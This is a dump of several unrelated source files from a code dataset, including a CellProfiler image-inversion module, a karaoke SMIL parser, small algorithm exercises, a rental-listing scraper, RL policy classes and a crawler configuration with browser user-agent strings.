settings\n self.input_color_choice = cps.Choice(\n \"Input image type\", CC_ALL, doc = \"\"\"\n Specify whether you are combining several grayscale images or\n loading a single color image.\"\"\")\n\n self.wants_red_input = cps.Binary(\n \"Use a red image?\",True, doc = \"\"\"\n Select %(YES)s to specify an image to use for the red channel.\"\"\"%globals())\n\n self.red_input_image = cps.ImageNameSubscriber(\n \"Select the red image\",cps.NONE)\n\n self.wants_green_input = cps.Binary(\n \"Use a green image?\",True, doc = \"\"\"\n Select %(YES)s to specify an image to use for the green channel.\"\"\"%globals())\n\n self.green_input_image = cps.ImageNameSubscriber(\n \"Select the green image\", cps.NONE)\n\n self.wants_blue_input = cps.Binary(\n \"Use a blue image?\", True, doc = \"\"\"\n Select %(YES)s to specify an image to use for the blue channel.\"\"\"%globals())\n\n self.blue_input_image = cps.ImageNameSubscriber(\n \"Select the blue image\", cps.NONE)\n\n self.color_input_image = cps.ImageNameSubscriber(\n \"Select the color image\", cps.NONE,doc = '''\n Select the color image to use.''')\n\n # Output settings\n self.output_color_choice = cps.Choice(\n \"Output image type\", CC_ALL, doc = \"\"\"\n Specify whether you want to produce several grayscale images or one color image.\"\"\")\n\n self.wants_red_output = cps.Binary(\n \"Select %(YES)s to produce a red image.\"%globals(), True)\n\n self.red_output_image = cps.ImageNameProvider(\n \"Name the red image\", \"InvertedRed\")\n\n self.wants_green_output = cps.Binary(\n \"Select %(YES)s to produce a green image.\"%globals(), True)\n\n self.green_output_image = cps.ImageNameProvider(\n \"Name the green image\", \"InvertedGreen\")\n\n self.wants_blue_output = cps.Binary(\n \"Select %(YES)s to produce a blue image.\"%globals(), True)\n\n self.blue_output_image = cps.ImageNameProvider(\n \"Name the blue image\", \"InvertedBlue\")\n\n self.color_output_image = cps.ImageNameProvider(\n \"Name the inverted color image\",\n \"InvertedColor\", doc = '''\n (Used only when producing a color output image)
\n Enter a name for the inverted color image.''')\n\n def settings(self):\n '''Return the settings as saved in the pipeline'''\n return [self.input_color_choice,\n self.wants_red_input, self.red_input_image,\n self.wants_green_input, self.green_input_image,\n self.wants_blue_input, self.blue_input_image,\n self.color_input_image,\n self.output_color_choice,\n self.wants_red_output, self.red_output_image,\n self.wants_green_output, self.green_output_image,\n self.wants_blue_output, self.blue_output_image,\n self.color_output_image]\n def help_settings(self):\n return [self.input_color_choice,\n self.wants_red_input, self.red_input_image,\n self.wants_green_input, self.green_input_image,\n self.wants_blue_input, self.blue_input_image,\n self.color_input_image,\n self.output_color_choice,\n self.color_output_image,\n self.wants_red_output, self.red_output_image,\n self.wants_green_output, self.green_output_image,\n self.wants_blue_output, self.blue_output_image ]\n\n def visible_settings(self):\n '''Return the settings as displayed in the UI'''\n result = [self.input_color_choice]\n if self.input_color_choice == CC_GRAYSCALE:\n for wants_input, input_image in \\\n ((self.wants_red_input, self.red_input_image),\n (self.wants_green_input, self.green_input_image),\n (self.wants_blue_input, self.blue_input_image)):\n result += [wants_input]\n if wants_input.value:\n result += [input_image]\n else:\n result += [self.color_input_image]\n result += [self.output_color_choice]\n if self.output_color_choice == CC_GRAYSCALE:\n for wants_output, output_image in \\\n ((self.wants_red_output, self.red_output_image),\n (self.wants_green_output, self.green_output_image),\n (self.wants_blue_output, self.blue_output_image)):\n result += [wants_output]\n if wants_output.value:\n result += [output_image]\n else:\n result += [self.color_output_image]\n return result\n\n def validate_module(self, pipeline):\n '''Make sure the user has at least one of the grayscale boxes checked'''\n if (self.input_color_choice == CC_GRAYSCALE and\n (not self.wants_red_input.value) and\n (not self.wants_green_input.value) and\n (not self.wants_blue_input.value)):\n raise cps.ValidationError(\"You must supply at least one grayscale input\",\n self.wants_red_input)\n\n def run(self, workspace):\n image_set = workspace.image_set\n shape = None\n if self.input_color_choice == CC_GRAYSCALE:\n if self.wants_red_input.value:\n red_image = image_set.get_image(\n self.red_input_image.value,\n must_be_grayscale=True).pixel_data\n shape = red_image.shape\n else:\n red_image = 0\n if self.wants_green_input.value:\n green_image = image_set.get_image(\n self.green_input_image.value,\n must_be_grayscale=True).pixel_data\n shape = green_image.shape\n else:\n green_image = 0\n if self.wants_blue_input.value:\n blue_image = image_set.get_image(\n self.blue_input_image.value,\n must_be_grayscale=True).pixel_data\n shape = blue_image.shape\n else:\n blue_image = 0\n color_image = np.zeros((shape[0],shape[1],3))\n color_image[:,:,0] = red_image\n color_image[:,:,1] = green_image\n color_image[:,:,2] = blue_image\n red_image = color_image[:,:,0]\n green_image = color_image[:,:,1]\n blue_image = color_image[:,:,2]\n elif self.input_color_choice == CC_COLOR:\n color_image = image_set.get_image(\n self.color_input_image.value,\n must_be_color=True).pixel_data\n red_image = color_image[:,:,0]\n green_image = color_image[:,:,1]\n blue_image = color_image[:,:,2]\n else:\n raise ValueError(\"Unimplemented color choice: %s\" %\n self.input_color_choice.value)\n inverted_red = (1 - green_image) * (1 - blue_image)\n inverted_green = (1 - red_image) * (1 - blue_image)\n inverted_blue = (1 - red_image) * (1 - green_image)\n inverted_color = np.dstack((inverted_red, inverted_green, inverted_blue))\n if self.output_color_choice == CC_GRAYSCALE:\n for wants_output, output_image_name, output_image in \\\n ((self.wants_red_output, self.red_output_image, inverted_red),\n (self.wants_green_output, self.green_output_image, inverted_green),\n (self.wants_blue_output, self.blue_output_image, inverted_blue)):\n if wants_output.value:\n image = cpi.Image(output_image)\n image_set.add(output_image_name.value, image)\n elif self.output_color_choice == CC_COLOR:\n image = cpi.Image(inverted_color)\n image_set.add(self.color_output_image.value, image)\n else:\n raise ValueError(\"Unimplemented color choice: %s\" %\n self.output_color_choice.value)\n\n if self.show_window:\n workspace.display_data.color_image = color_image\n workspace.display_data.inverted_color = inverted_color\n\n\n def display(self, workspace, figure):\n figure.set_subplots((2, 1))\n color_image = workspace.display_data.color_image\n inverted_color = workspace.display_data.inverted_color\n figure.subplot_imshow(0, 0, color_image, \"Original image\")\n figure.subplot_imshow(1, 0, inverted_color, \"Color-inverted image\",\n sharexy = figure.subplot(0,0))\n\n def upgrade_settings(self, setting_values, variable_revision_number,\n module_name, from_matlab):\n if from_matlab and variable_revision_number == 1:\n setting_values = [\n CC_GRAYSCALE, # input_color_choice\n setting_values[0] != cps.NONE, # wants_red_input\n setting_values[0], # red_input_image\n setting_values[1] != cps.NONE,\n setting_values[1],\n setting_values[2] != cps.NONE,\n setting_values[2],\n cps.NONE, # color\n CC_GRAYSCALE, # output_color_choice\n setting_values[3] != cps.NONE,\n setting_values[3],\n setting_values[4] != cps.NONE,\n setting_values[4],\n setting_values[5] != cps.NONE,\n setting_values[5],\n 'InvertedColor']\n from_matlab = False\n variable_revision_number = 1\n\n return setting_values, variable_revision_number, from_matlab\n","sub_path":"cellprofiler/modules/invertforprinting.py","file_name":"invertforprinting.py","file_ext":"py","file_size_in_byte":10936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"284708933","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom xml.sax import make_parser\nfrom xml.sax.handler import ContentHandler\nfrom smallsmilhandler import SmallSMILHandler\nimport smallsmilhandler\nimport sys\nimport json\nfrom urllib.request import urlretrieve\n\n\nclass KaraokeLocal(SmallSMILHandler):\n\n def __init__(self, fich):\n parser = make_parser()\n cHandler = smallsmilhandler.SmallSMILHandler()\n parser.setContentHandler(cHandler)\n fich = open(sys.argv[1], 'r')\n parser.parse(fich)\n self.datos = cHandler.get_tags()\n\n def __str__(self):\n elem = ''\n for lista in self.datos:\n elem = lista[0]\n sublista = lista[1]\n for atributo in sublista:\n elem = elem + \"\\t\" + atributo + \"=\" + sublista[atributo] + \" \"\n print(elem + \"\\n\")\n return(elem)\n\n def to_json(self, fich, new_fich=\"\"):\n if new_fich == \"\":\n nf = fich[:fich.find('.')]\n else:\n nf = new_fich\n fich_json = open(nf + '.json', 'w')\n json.dump(self.datos, fich_json, sort_keys=True, indent=4, separators=(',', ':'))\n fich_json.close()\n\n def do_local(self):\n for lista in self.datos:\n sublista = lista[1]\n for atributo in sublista:\n if sublista[atributo][:7] == \"http://\":\n urlretrieve(sublista[atributo])\n print(sublista[atributo])\n url = sublista[atributo].split('/')\n sublista[atributo] = url[-1]\n print(sublista[atributo])\n\nif __name__ == \"__main__\":\n\n try:\n fich = sys.argv[1]\n karaoke = KaraokeLocal(fich)\n print(karaoke)\n karaoke.do_local()\n karaoke.to_json(fich)\n print(karaoke)\n\n except IndexError:\n sys.exit(\"Usage: python3 karaoke.py file.smil\")\n","sub_path":"karaoke.py","file_name":"karaoke.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"103995559","text":"__author__ = 'lenovo'\r\n\r\nclass LinkNode(object):\r\n def __init__(self,val):\r\n self.val = val\r\n self.next = None\r\n\r\nclass Link(object):\r\n def __init__(self):\r\n self.root = None\r\n\r\n def construct_tree(self,n):\r\n if n < 1:\r\n return None\r\n self.root = LinkNode(0)\r\n node = self.root\r\n for i in range(1,n):\r\n temp = LinkNode(i)\r\n node.next = temp\r\n node = temp\r\n node.next = self.root\r\n return self.root\r\n\r\ndef solution(node,n,m):\r\n while n:\r\n if n == 1:\r\n return node.val\r\n\r\n if m == 1:\r\n for _ in range(n-1):\r\n node = node.next\r\n return node.val\r\n\r\n for _ in range(m-2):\r\n node = node.next\r\n\r\n temp = node.next.next\r\n node.next = temp\r\n node = temp\r\n n -= 1\r\n\r\nif __name__ == \"__main__\":\r\n link = Link()\r\n n=50\r\n m=20\r\n print(solution(link.construct_tree(n),n,m)) #33\r\n n=4\r\n m=3\r\n print(solution(link.construct_tree(n),n,m)) #0\r\n n=1\r\n m=1\r\n print(solution(link.construct_tree(n),n,m)) #44","sub_path":"Python剑指Offer/046_圆圈中最后剩下的数字(约瑟夫环)/046.py","file_name":"046.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"394404431","text":"from keras.models import Sequential\nfrom keras.layers import LSTM, Dense, Activation, Dropout\n'''\ndef caption_model(word_num, hidden_num, max_length):\n\n ratio = 0.5\n\n embed_id = layers.Embedding\n LSTM = layers.LSTM\n Drop = layers.Dropout\n\n model = Sequential()\n\n model.add(embed_id(word_num, hidden_num))\n model.add(Drop(ratio))\n model.add(LSTM(hidden_num, input_shape = (hidden_num)))\n model.add(Drop(ratio))\n\n return model\n'''\n\ndef motion_model(TIME, JOINTNUM, HIDDEN_NUM):\n\n model = Sequential()\n\n model.add(LSTM(HIDDEN_NUM, input_shape = (TIME,JOINT_NUM)))\n model.add(Dropout(0.5))\n model.add(Dense(2048))\n model.add(Dropout(0.5))\n model.add(Activation('softmax'))\n\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n model.summary()\n\n\n with open('motion_caption_model.json','w') as fp:\n json_string = model.to_json()\n fp.write(json_string)\n\n return model\n","sub_path":"motion_caption/src/motion_caption_model.py","file_name":"motion_caption_model.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"186168518","text":"import string, os, sys\r\n\r\nclass CodeGraph(object):\r\n\tdef __init__(self, \r\n\t\t\t\tresultsArray = [],\r\n\t\t\t\tfuncNameArray = [],\r\n\t\t\t\tfuncResDict = {},\r\n\t\t\t\toutputFileName = None,\r\n\t\t\t\tpath = None,\r\n\t\t\t\tsourcefiles = [],\r\n\t\t\t\t):\r\n\t\tsuper(CodeGraph, self).__init__()\r\n\t\t \r\n\t\tself.resultsArray = resultsArray\r\n\t\tself.funcNameArray = funcNameArray\r\n\t\tself.outputFileName = outputFileName\r\n\t\tself.funcResDict = funcResDict\r\n\t\tself.path = path\r\n\t\tself.sourcefiles = sourcefiles\r\n\r\n\r\n\tdef coverageOutputGather(self):\r\n\t\tfile = open(self.outputFileName, 'r')\r\n\t\tfor line in file:\r\n\t\t\tif '.py' in line[-4:]:\r\n\t\t\t\tself.funcNameArray.append(line[:-1])\r\n\t\t\tif 'result :' in line:\r\n\t\t\t\tself.resultsArray.append(line[-2:-1])\r\n\t\tprint(self.funcNameArray)\r\n\t\tprint(self.resultsArray)\t \r\n\t\t#return funcNameArray,resultsArray\r\n\t\t \r\n\tdef dot_to_png(self):\r\n\t\tfiles = os.listdir(self.path) \r\n\t\tfor f in files:\r\n\t\t\tif f[-3:]==\"dot\": \r\n\t\t\t\tinputname = os.path.realpath(f)\r\n\t\t\t\toutputname = inputname.replace(\".dot\", \".png\")\r\n\t\t\t\tos.system('c:\\Program Files (x86)\\Graphviz\\bin\\dot.exe -Tpng \"' + os.path.realpath(f) + '\" -o \"' + outputname + '\"')\r\n\t\t\t\r\n\tdef dot_to_svg(self): \r\n\t\tfor f in os.listdir(self.path):\r\n\t\t\tif f[-3:]==\"dot\": \r\n\t\t\t\tinputname = os.path.join(self.path, f)\r\n\t\t\t\toutputname = inputname.replace(\".dot\", \".svg\")\r\n\t\t\t\t#print('C:\\Graphviz\\bin\\dot.exe -Tsvg \"' + inputname + '\" -o \"' + outputname + '\"')\r\n\t\t\t\tos.system('C:\\\\Graphviz\\\\bin\\\\dot.exe -Tsvg \"' + inputname + '\" -o \"' + outputname + '\"')\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t \r\n\tdef traceToDotConversion(self):\r\n\t\tfor f in os.listdir(self.path): \r\n\t\t\t#print(self.path)\r\n\t\t\tif f[-5:] == 'ftest':\r\n\t\t\t\t#outpath = os.path.realpath(f) + '\\\\codeGraph'\r\n\t\t\t\toutname = os.path.join(self.path,f.replace(\".ftest\", \".dot\"))\r\n\t\t\t\toutputfile = open(outname , 'w')\r\n\t\t\t\toutputfile.write('digraph { \\n')\r\n\t\t\t\tinputfile = open(os.path.join('codeGraph',f), 'r')\r\n\t\t\t\tflow = 0\r\n\t\t\t\toutline = ''\r\n\t\t\t\tresultIndex = -1\r\n\t\t\t\tfor line in inputfile: \r\n\t\t\t\t\tsubline = line[:4]\r\n\t\t\t\t\tresultIndex = -1\r\n\t\t\t\t\tif '---' in subline:\t\t\t\t\t\r\n\t\t\t\t\t\tfuncIndex = line.find('funcname:')\r\n\t\t\t\t\t\t#print (funcIndex)\r\n\t\t\t\t\t\tfuncName = line[funcIndex+10:-1]\r\n\t\t\t\t\t\t#resultIndex = self.funcNameArray.index(funcName)\r\n\t\t\t\t\t\t#print (funcName)\r\n\t\t\t\t\t\tmodIndex = line.find('modulename:')\r\n\t\t\t\t\t\t#print (funcIndex)\r\n\t\t\t\t\t\tmodName = line[modIndex+12:funcIndex-2]\r\n\t\t\t\t\t\t#print (modName)\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif flow == 0:\r\n\t\t\t\t\t\t\tresultIndex = self.funcNameArray.index(funcName)\r\n\t\t\t\t\t\t\toutline = ' ' + funcName\r\n\t\t\t\t\t\t\tflow = 1\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\toutline = outline + ' -> ' + funcName\r\n\t\t\t\t\t\t\tif self.resultsArray[resultIndex] == 0:\r\n\t\t\t\t\t\t\t\toutline = outline + ' [color=green];\\n'\r\n\t\t\t\t\t\t\telif self.resultsArray[resultIndex] == 1:\r\n\t\t\t\t\t\t\t\toutline = outline + ' [color=red];\\n'\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\toutline = outline + ' [color=orange];\\n'\r\n\t\t\t\t\t\t\t#for mod in range(0,len(self.sourcefiles)):\r\n\t\t\t\t\t\t\t#\tif modName in self.sourcefiles[mod]:\r\n\t\t\t\t\t\t\toutputfile.write(outline)\r\n\t\t\t\t\t\t\toutline = ' ' + funcName\r\n\t\t\t\toutputfile.write('}')\r\n\t\t\t\toutputfile.close()\r\n\t\t\t\t\r\n\t\t\t\r\n","sub_path":"pTarantula/codeGraph.py","file_name":"codeGraph.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"464578410","text":"\n# coding: utf-8\n\n# In[60]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas\n\n\nbaseUrl=\"http://sh.ziroom.com/z/nl/z2.html\"\nheaders={\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'\n}\n\ndef getHouse(url):\n try:\n house={}\n res=requests.get(url,headers=headers)\n soup=BeautifulSoup(res.text,'html.parser')\n title=soup.select(\".room_name h2\")[0].text.strip()\n address=soup.select(\"div[class='room_name'] span[class='ellipsis']\")[0].text.strip().replace(\" \",\"\").replace(\"\\n\",\"\")\n #price=soup.select(\"span[class='room_price']\")[0].text\n area=soup.select(\"ul[class='detail_room'] li\")[0].text.replace(\" \",\"\")[4:-1]\n face=soup.select(\"ul[class='detail_room'] li\")[1].text[4:]\n type=soup.select(\"ul[class='detail_room'] li\")[2].text.replace(\" \",\"\")[3:-3]\n floor=soup.select(\"ul[class='detail_room'] li\")[3].text[4:]\n around=soup.select(\"div[class='aboutRoom gray-6'] p\")[0].text[3:]\n traffic=soup.select(\"div[class='aboutRoom gray-6'] p\")[1].text[3:-1]\n house[\"标题\"]=title\n house[\"地址\"]=address\n #house[\"价格\"]=price\n house[\"面积\"]=area\n house[\"朝向\"]=face\n house[\"户型\"]=type\n house[\"楼层\"]=floor\n house[\"周边\"]=around\n house[\"交通\"]=traffic\n house[\"网址\"]=url\n return house\n except:\n print(\"error\")\n\ndef getHouses(start,end):\n houses=[]\n for j in range(start,end+1):\n print(\"开始爬取第\"+str(j)+\"页数据\")\n res=requests.get(\"http://sh.ziroom.com/z/nl/z2.html?p=\"+str(j),headers=headers)\n soup=BeautifulSoup(res.text,'html.parser')\n urls=soup.select(\"#houseList h3 a\")\n i=1\n for url in urls:\n print(\"开始爬取第\"+str(i)+\"条数据\")\n print(\"http:\"+url[\"href\"])\n houses.append(getHouse(\"http:\"+url[\"href\"]))\n print(\"爬取结束\")\n print(\"-\"*50)\n i+=1\n return houses\n\nprint(\"start\")\ndf=pandas.DataFrame(getHouses(1,50))\ndf.to_excel(\"d:/ziroom.xlsx\")\nprint(\"end\")\n\n","sub_path":"HLTH Speaker Webscripting/ziroom.py","file_name":"ziroom.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"94416289","text":"import json\r\nfrom urllib import request\r\nimport time\r\n\r\ndef encrypt(text,offset):\r\n result = []\r\n for i in list(text):\r\n result.append(chr(ord(i) + offset))\r\n return \"\".join(result)\r\n\r\ndef task_1():\r\n print(\"以下是任务一:凯撒加密\")\r\n str_input = input(\"请输入加密内容:\\n\")\r\n while True:\r\n if len(str_input) == 0:\r\n str_input = input(\"哥们,输入点东西呗~\")\r\n else:\r\n break\r\n\r\n print(\"请输入偏移量,默认为3(不输入使用默认,支持输入正负整数,输入0就没什么意思了)\")\r\n offset = 3\r\n while True:\r\n try:\r\n str_offset = input()\r\n if len(str_offset) != 0:\r\n offset = int(str_offset)\r\n break\r\n except Exception as e:\r\n print(\"输入整数,亲~\", e)\r\n print(\"经过加密,输出为:\", encrypt(str_input, offset))\r\n\r\ndef task_1_add():\r\n print(\"解密什么的,在原基础上修改偏移量正负数就好了 ^_^!\")\r\n\r\ndownload_progress = 0\r\ndef download_callback(blocknum, blocksize, totalsize):\r\n global download_progress\r\n download_now = (blocknum * blocksize * 10) / totalsize\r\n download_now = int(download_now)\r\n if download_now > download_progress:\r\n download_progress = download_now\r\n print(\"=\",end=\"\")\r\n if download_now == 10:\r\n print(\">\")\r\n\r\ndef task_2():\r\n #————关于Bing的每日一图,网上已经提供了接口,就不用抓包了————\r\n print(\"任务二:下载Bing的每日一图~~\") #使用自带的urllib就不用安装依赖了,虽然使用起来麻烦\r\n save_name = input(\"请输入图片名字,不使用则使用默认名字\\n\")\r\n if len(save_name) == 0:\r\n str_time = time.strftime(\"%Y-%m-%d\", time.localtime())\r\n save_name = \"Bing每日一图 \" + str_time + \".jpg\"\r\n elif not save_name.endswith(\"jpg\"):\r\n save_name = save_name + \".jpg\"\r\n\r\n print(\"下载中……\")\r\n\r\n\r\n json_url = \"https://cn.bing.com/HPImageArchive.aspx?format=js&idx=0&n=1\"\r\n photo_url = \"https://cn.bing.com/th?id=OHR.Matamata_ZH-CN8111830275_1920x1080.jpg&rf=LaDigue_1920x1080.jpg&pid=hp\"\r\n\r\n while True:\r\n try:\r\n request.urlretrieve(photo_url, \"./\" + save_name, download_callback)\r\n\r\n data = request.urlopen(json_url).read()\r\n json_data = data.decode('utf-8')\r\n json_data = json.loads(json_data)\r\n break\r\n except Exception as e:\r\n print(\"下载失败!\")\r\n input(\"按任意键重试\")\r\n\r\n print(json_data[\"images\"][0][\"copyright\"])\r\n\r\nprint(\"这是后台第一轮考核的程序\")\r\ntask_1()\r\ntask_1_add()\r\nprint()\r\ntask_2()\r\nprint(\"任务结束~~~\")","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"559194253","text":"def get_policy(args, n_actions, rng):\n if args.policy_type == \"one_action\":\n return OneAction(args.action)\n elif args.policy_type == \"random_policy\":\n return RandomPolicy(n_actions, rng)\n elif args.policy_type == \"epsilon_greedy\":\n return EpsilonGreedy(n_actions, args.epsilon_start, args.epsilon_decay, args.epsilon_min, rng)\n else:\n raise ValueError(\"Unrecognized policy_type: {}\".format(args.policy_type))\n\n\nclass GreedyPolicy:\n @staticmethod\n def get_action(state, model):\n return model.get_output(state).argmax()\n\n\nclass EpsilonGreedy:\n def __init__(self, n_actions, epsilon_start, epsilon_decay, epsilon_min, rng):\n self.n_actions = n_actions\n self.epsilon_start = epsilon_start\n self.epsilon = self.epsilon_start\n self.epsilon_decay = epsilon_decay\n self.epsilon_min = epsilon_min\n if epsilon_decay != 0:\n self.epsilon_rate = (self.epsilon_start - self.epsilon_min) / self.epsilon_decay\n else:\n # epsilon = const\n self.epsilon_rate = 0\n\n self.rng = rng\n\n def get_action(self, state, model):\n if self.rng.rand() < self.epsilon:\n action = self.rng.randint(0, self.n_actions)\n else:\n action = model.get_output(state).argmax()\n self._decay()\n return action\n\n def _decay(self):\n self.epsilon = max(self.epsilon_min, self.epsilon - self.epsilon_rate)\n\n\nclass RandomPolicy:\n def __init__(self, n_actions, rng):\n self.n_actions = n_actions\n self.rng = rng\n\n def get_action(self, *args):\n return self.rng.randint(0, self.n_actions)\n\n\nclass OneAction:\n def __init__(self, action):\n self.action = action\n\n def get_action(self, *args):\n return self.action\n\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"rl/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"59357808","text":"import sqlite3\n\nconexion=sqlite3.connect(\"usuarios_autoincrement.db\")\ncursor=conexion.cursor()\n\ncursor.execute(\"\"\"\n SELECT * FROM usuarios WHERE edad=11\n \"\"\")\n#usuario=cursor.fetchone()\n#print(usuario)\n\nusuarios=cursor.fetchall()\nprint(usuarios)\n\nconexion.commit()\nconexion.close()\n","sub_path":"Fase 4 - Temas avanzados/Tema 14 - Bases de datos con SQLite/leccion3.py","file_name":"leccion3.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"44298988","text":"from plug_nozzle_angelino import plug_nozzle\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport aerospike_optimizer as ao \nimport gasdynamics as gd \nfrom scipy import interpolate\n\nr_e = 0.027 \nT_w = 600\nalpha = 1\nbeta = 1\ntruncate_ratio_init = 0.2\ndesign_alt_init = 9144 # 30 % greater\n\ntry:\n\topt_aero = ao.aerospike_optimizer(r_e,T_w,alpha,beta,design_alt_init,truncate_ratio_init,chr_mesh_n=120,no_alt_range = 30,no_core=1)\nexcept:\n\tpass\n#design diverging section, 20% truncation\n\nplug1 = opt_aero.spike_init\n\nplug1.define_compression(1.15/1000,4.51/1000,1,12.91/1000,10000)\n\nprint('Thrust = ' + str(plug1.calc_ideal_thrust(gd.standard_atmosphere([9144])[0])))\nprint('Throat area = ' + str(plug1.A_t))\nprint('Expansion ratio = ' + str(plug1.expansion_ratio))\n#plug1.plot_contour(plt)\n#plt.axis('equal')\n\n\ntck = interpolate.splrep(plug1.x,plug1.y)\n\n\nplt.plot(plug1.x,plug1.y,plug1.x,interpolate.splev(plug1.x,tck),'ro')\n\ninit_angle = np.arctan(interpolate.splev(plug1.x[0],tck,der=1))\n\nprint(\"inital angle: \" + str(init_angle*180/np.pi))\nplt.show()\n\nplug1.save_to_csv()\n","sub_path":"angelinoNozzle_py/test_plug_code.py","file_name":"test_plug_code.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"307746458","text":"#############################################################################\n#\n# PostgreSQL Enterprise Manager\n#\n# Copyright (C) 2015 - 2016, EnterpriseDB Corporation. All rights reserved.\n#\n# docker_agent.py - check status of cluster , ssh and scp function are \n# defined.\n#\n#############################################################################\n\n\nimport subprocess,config\nimport os,config\nfrom check_status import ssh_execute\n\n\n\ndef docker_agent(no_agent):\n\ttry:\n\t\tif ssh_execute(\"sudo systemctl start docker\" ) == 0:\n\t\t\tif ssh_execute(\"sudo docker build -t 'pem_agent' .\" ) == 0:\n\t\t\t\tif ssh_execute(\"sudo sh doc_agentlaunch.sh \"+str(config.FLOATING_IP)+\" centos 5432 pem_agent \"+str(no_agent) ) == 0:\n\t\t\t\t# if ssh_execute(\"sudo sh doc_agentlaunch.sh 172.16.253.230 centos 5432 pem_agent \"+str(no_agent) ) == 0:\n\t\t\t\t\tprint(\"Successfully build the dockker conatiner\")\n\t\t\t\t\treturn 0\n\n\texcept Exception as e:\n\t\tprint(\"Docker agent failed: {0}\".format(str(e)))\n\t\treturn 1\n\n\n\nif __name__ == '__main__':\n\tdocker_agent(config.NO_AGNET_CONTAINER)\n\n\n","sub_path":"openstack/docker_agent.py","file_name":"docker_agent.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"535784160","text":"#! /usr/bin/python\n###########################################################################\n# Copyright (C) 2018 Phani Vadrevu #\n# phani@cs.uno.edu #\n# #\n# Distributed under the GNU Public License #\n# http://www.gnu.org/licenses/gpl.txt #\n# #\n# This program is free software; you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation; either version 2 of the License, or #\n# (at your option) any later version. #\n# #\n###########################################################################\nimport os\nHOME = os.getenv('HOME')\nCHROME_BINARY_PATH = os.path.join (HOME, \"chrome_binary/\") # The path of the binary\nMAIN_LOG_PATH = os.path.join(HOME, \"se-hunter/logs/\")\nSCREENSHOTS_DIR = \"screenshots\"\nSEHUNTER_LOGS_DIR = \"sehunter_logs\"\nJSGRAPH_LOGS_DIR = \"jsgraph_logs\"\nCHROMEDRIVER_LOGS_DIR = \"chromedriver_logs\"\nCHROMEDATA_DIR = \"chrome_data\"\nDOWNLOADS_DIR = \"downloads\"\nRAW_DOWNLOADS_DIR = \"downloads/raw\"\nHTML_LOGS_DIR = \"html_logs\"\nAD_OBJECTS_DIR = \"ads\"\nAD_CHAIN_PROCESS_LOG = 'ad_chain_process.log'\n\nFILE_SERVER = \"uname@server\"\nFILE_SERVER_RESIDENTIAL = \"uname@server\"\n\nRESIDENTIAL_SEEDS = ['apu_php.txt']\nRES_JOBS_FILE = \"residential_list.txt\"\nNONRES_JOBS_FILE = \"non_residential_list.txt\"\n\nOBSOLETE_PROCESS_AGE = 100 # Kill orphan processes older than x seconds.\n\nMIN_CHROME_DEBUG_PORT = 10000\nMAX_CHROME_DEBUG_PORT = 40000\n\nUSER_AGENTS = {\n # Emulate a 1920x1080 (1785,993) desktop; Other variant: 1440x900 (1375,738-win_size_cmd)\n \"chrome_mac\": {\n \"user_agent\": ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'),\n \"window_size_cmd\": (1785, 993),\n \"device_size\": (1920, 1080),\n \"device_scale_factor\": 1,\n \"mobile\": False,\n },\n\n \"ie_win\": {\n \"user_agent\": ('Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)'),\n \"window_size_cmd\": (1785, 993),\n \"device_size\": (1920, 1080),\n \"device_scale_factor\": 1,\n \"mobile\": False,\n\n },\n\n \"edge_win\": {\n \"user_agent\": ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'),\n \"window_size_cmd\": (1785, 993),\n \"device_size\": (1920, 1080),\n \"device_scale_factor\": 1,\n \"mobile\": False,\n },\n\n # Samsung Galaxy S9 Plus; personal test: win size: (412, 718); 1440 * 2960 is the screen size;\n # win size From: https://mediag.com/news/popular-screen-resolutions-designing-for-all/ (360, 740)\n # Also here: https://www.mydevice.io/#compare-devices\n \"chrome_android\": {\n \"user_agent\": ('Mozilla/5.0 (Linux; Android 8.0.0; SM-G965F Build/R16NW) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36'),\n \"window_size_cmd\": (360, 740),\n #\"device_size\": (1440, 